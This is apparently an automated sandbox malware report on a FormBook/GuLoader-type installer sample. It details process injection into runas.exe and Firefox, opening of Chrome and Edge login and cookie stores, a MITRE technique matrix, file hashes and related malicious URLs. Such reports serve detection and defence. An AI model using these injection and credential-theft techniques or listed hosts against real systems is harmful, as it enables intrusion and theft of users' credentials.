        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtOpenFile: Direct from: 0x779D2CEC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtReadVirtualMemory: Direct from: 0x779D2DAC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtAllocateVirtualMemory: Direct from: 0x779D480C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtWriteVirtualMemory: Direct from: 0x779D482C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtClose: Direct from: 0x779D2A8C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtSetInformationThread: Direct from: 0x779D2A6C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtCreateKey: Direct from: 0x779D2B8C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQueryAttributesFile: Direct from: 0x779D2D8C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQueryVolumeInformationFile: Direct from: 0x779D2E4C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtDeviceIoControlFile: Direct from: 0x779D2A0C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQuerySystemInformation: Direct from: 0x779D47EC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtAllocateVirtualMemory: Direct from: 0x779D2B0C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtOpenSection: Direct from: 0x779D2D2C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtProtectVirtualMemory: Direct from: 0x779C7A4E
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtDelayExecution: Direct from: 0x779D2CFC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtOpenKeyEx: Direct from: 0x779D2ABC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQueryInformationProcess: Direct from: 0x779D2B46
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtResumeThread: Direct from: 0x779D2EDC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtProtectVirtualMemory: Direct from: 0x779D2EBC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtCreateUserProcess: Direct from: 0x779D363C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtSetInformationProcess: Direct from: 0x779D2B7C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtWriteVirtualMemory: Direct from: 0x779D2D5C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtNotifyChangeKey: Direct from: 0x779D3B4C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtAllocateVirtualMemory: Direct from: 0x779D2B1C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtResumeThread: Direct from: 0x779D35CC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtMapViewOfSection: Direct from: 0x779D2C3C
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtReadFile: Direct from: 0x779D29FC
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe NtQuerySystemInformation: Direct from: 0x779D2D1C
        Source: C:\Users\user\Desktop\FRA.0038253.exe Section loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\FRA.0038253.exe Section loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: read write
        Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\runas.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\runas.exe Thread register set: target process: 3652
        Source: C:\Windows\SysWOW64\runas.exe Thread APC queued: target process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exe Process created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
        Source: C:\Windows\SysWOW64\runas.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager(V
        Source: aqqPMpTRvveOzLCNSEwwpwdiQeo.exe, 00000004.00000000.2882940818.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\FRA.0038253.exe Code function: 0_2_004033A2 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A2

        Stealing of Sensitive Information

        Source: Yara match File source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\runas.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\runas.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 12 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 312 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        [Behavior graph: ID 1445848, sample FRA.0038253.exe, start date 22/05/2024, architecture WINDOWS, score 100]

        Source | Detection | Scanner | Label | Link
        FRA.0038253.exe | 5% | ReversingLabs | |
        FRA.0038253.exe | 100% | Avira | HEUR/AGEN.1336996 |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        Name | Malicious | Antivirus Detection | Reputation
        Name | Source | Malicious | Antivirus Detection | Reputation
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        Joe Sandbox version: 40.0.0 Tourmaline
        Analysis ID: 1445848
        Start date and time: 2024-05-22 17:27:33 +02:00
        Joe Sandbox product: CloudBasic
        Overall analysis duration: 0h 17m 58s
        Hypervisor based Inspection enabled: false
        Report type: full
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name: Suspected Instruction Hammering
        Number of analysed new started processes analysed: 6
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 2
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode: default
        Sample name: FRA.0038253.exe
        Detection: MAL
        Classification: mal100.troj.spyw.evad.winEXE@7/9@27/12
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 92%
        • Number of executed functions: 58
        • Number of non-executed functions: 236
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
        • Excluded IPs from analysis (whitelisted): 20.106.86.13
        • Excluded domains from analysis (whitelisted): atm-settingsfe-prod-geo2.trafficmanager.net, settings-prod-wus3-1.westus3.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, nexusrules.officeapps.live.com
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: FRA.0038253.exe
        Time | Type | Description
        11:31:34 | API Interceptor | 28501478x Sleep call for process: runas.exe modified
        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                            • www.sellstov.top/8cuu/
                                                            4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • www.shortfox.top/doag/
                                                            47.243.134.243waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/gzu1/
                                                            fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                            • www.cngdesk.com/mcz6/
                                                            F24-005880.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/gzu1/
                                                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.cngdesk.com/op6t/
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):642577
                                                                        Entropy (8bit):0.15688102212856736
                                                                        Encrypted:false
                                                                        SSDEEP:384:1CThvb6qpJM51+qDtHndoq9zMhjBH8S/mIB3mtOLjsC/gz+8U/jLco4zNsO2MTiz:nlQQKmtJULsNsODkxV
                                                                        MD5:CDCEC2C558FA8A8E63AA5356507265B3
                                                                        SHA1:69423E82B8C5A9CE561BE425DE34E38FD348246E
                                                                        SHA-256:E85B367006F230C3B2E29A11766CDA65A0582F9EAB4A601BDECEA7229B26D0FC
                                                                        SHA-512:B01517DAC0CE0B0320A6889FD9E1C385731DE8713677003FCDDC020ADD8B2E70126EF9711D63172B58B6EF7911629FDFFFD0E290B021FFE2D7AB4BD439345122
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):383244
                                                                        Entropy (8bit):7.626599650795766
                                                                        Encrypted:false
                                                                        SSDEEP:6144:cigWKNgKbYNLysMPuFNecKbNsG6MnH2sH4le5xx567Tl9QoJ06T6r4l:cOKNcCPQKb+Gxn17jKTldWu6Ul
                                                                        MD5:364A269FD74434764B105B858C744A25
                                                                        SHA1:165011DD3CD6BF08689CD1ADCA49B709540FB90A
                                                                        SHA-256:4CED9FD0F138C541F54922E81E96EDAB706803AC5A69356D02A0DEAB5F632224
                                                                        SHA-512:69FF9E7214850BB5C9B4978F0C15FB08296C1ABBC025C0260C6E500B156FACFABCCACED1CF9FAFEED55BB484DB6443CD85DD7AD507B8C892F493E76B21C0FB73
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1265190
                                                                        Entropy (8bit):0.15959484718224348
                                                                        Encrypted:false
                                                                        SSDEEP:768:HC2H0KZapOXkkuEb/eLGdJoyr9XAtNK5i62zCxT7ciI4m:l9
                                                                        MD5:15D9EACEF1E85CF33B6BDA50A20BB952
                                                                        SHA1:F970803C1192FC9E74F54F23124EA401522C70E1
                                                                        SHA-256:9E381E8BE66B5E4B91462ED8FB919409595EB718E600F4327D864743EC899DDE
                                                                        SHA-512:705783CF4E7CD5CDB33277F60994D8A60C977990D7615EE8C1EA9A52A452F043D3FFFCE0D8AD3999E80F8DF15A3350272E87E34B244A9FD780FD925A40CB966B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1065541
                                                                        Entropy (8bit):0.15989812624905142
                                                                        Encrypted:false
                                                                        SSDEEP:768:YBQpe8ptpsXQPCNuvNyZVS83SVKpUQmRhFJzdEqQgapTQVNvW:LtM
                                                                        MD5:8A71483589E505B551DAB3E14CAECF9F
                                                                        SHA1:D0FA3D65A453D2C274F3FA6C3318BD28DD34CD35
                                                                        SHA-256:DCA1DCEFB8B08F47A8D82F1135F1B6E6EDFFDB70930A1227676EC4F7A1D9502A
                                                                        SHA-512:9672A5C5D04FCA5FB5D9195CAEE4CDE23E27778069586C6D2CC28C649E9D63CF176FFDCC0D8DF77B10192C2D058CA17CCED76AC993E18C1F02C602FCFD6D4809
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):691600
                                                                        Entropy (8bit):0.16049501893639687
                                                                        Encrypted:false
                                                                        SSDEEP:384:ilBG9dPPlcRudyhsEJ3u1j8qiNRLMH1VRJ0sx3ldd6z83v7rXDvUE0uGavEy0m2y:h97ohs11QnNu53/rvDvR0y7u+GheAd2
                                                                        MD5:A9E2CB65CC04E6C0F54609FB8B7CC0A4
                                                                        SHA1:159D40F96A5C58DD7FE2D93D2CFBE22E13EF530A
                                                                        SHA-256:06AABA7BFAE63698E760B60D9C7CAD5C8A5A4A85595153C90C306A61C47A20F7
                                                                        SHA-512:E35545502071C3870BEF25277BE7DAF509F52D087CDBC600917794580BBFFCA48A439289F887F6B65C7D245DBDC7FEC239714B6E2794140B7B71F3E54A66AACA
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):465
                                                                        Entropy (8bit):4.2798744576617676
                                                                        Encrypted:false
                                                                        SSDEEP:12:qzwPKeCdBPOQWLuNM32fXE9APJBE3uKCMJ5JqXLSKOt:quCdBUuNDUGJBwNqX3g
                                                                        MD5:A351FC586F6D81C2D14B8ED97FA675FE
                                                                        SHA1:699ECB3F5C9409026082F83AD4F040151D285DB1
                                                                        SHA-256:94D29FE8A4B016CB3AB9B3134B49911795198B3E1C16DF0D16E3C8F7B45ED2FE
                                                                        SHA-512:A023DF771D677AC64EC5AE718229552379AB3EC037B92CE5ACC7CA56320ADF94D1EED0A37599ADC6D595F38293FC0FFACB20DED5D55A95C47C797CCC518B9D3F
                                                                        Malicious:false
                                                                        Preview:uranothallite deputationernes soundful.unliftable nihility glycogenizes landshold indtgtsnedgangens croakiest indkrslerne rokken superadequateness whickers skrumpenyres noncorruption..spectacled scapha acronyc headpin.arborous eternittens veridity.tilordningernes otteren dielectrics odourless unseveredly ledsagefnomeners reconsigns miltonian udgravningsfelt..dialogformers mordvinian afskumningens haemoglobinuria rosemaling forsigtigpakkers skillerum mesomorph..
                                                                        Process:C:\Windows\SysWOW64\runas.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):188416
                                                                        Entropy (8bit):0.9926780404836638
                                                                        Encrypted:false
                                                                        SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                        MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                        SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                        SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                        SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48
                                                                        Entropy (8bit):4.78778203183594
                                                                        Encrypted:false
                                                                        SSDEEP:3:iGAIEXrcAQLQIfLBJXmgxv:lAIccAQkIP2I
                                                                        MD5:F5FDC9A00B0149608E24C58FD5249EA4
                                                                        SHA1:E2D50A7CDC8E7A9F9CC9F86074AE23F86A32F841
                                                                        SHA-256:12D2CA5CF65237CE9AC610E3A80AD20135A76D7E62C1FD92DED6CEA68F774C7C
                                                                        SHA-512:178DFAB68C39D0D58650B5AEECB702002E82683CD44777920AD884DA89C31BBD1164345CF7F1EC11CD851A249CB4CD7DA0C546C048AADB47F00B7A21304BC7F4
                                                                        Malicious:false
                                                                        Preview:[Access]..Early=user32::EnumWindows(i r1 ,i 0)..
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):5.744994954995265
                                                                        Encrypted:false
                                                                        SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                                                        MD5:12B140583E3273EE1F65016BECEA58C4
                                                                        SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                                                        SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                                                        SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
• Filename: DOC.rar, Detection: malicious
• Filename: DOC.rar, Detection: malicious
• Filename: Twrchtrywth.exe, Detection: malicious
• Filename: Twrchtrywth.exe, Detection: malicious
• Filename: Transferencia.exe, Detection: malicious
• Filename: Transferencia.exe, Detection: malicious
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.630677995866131
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
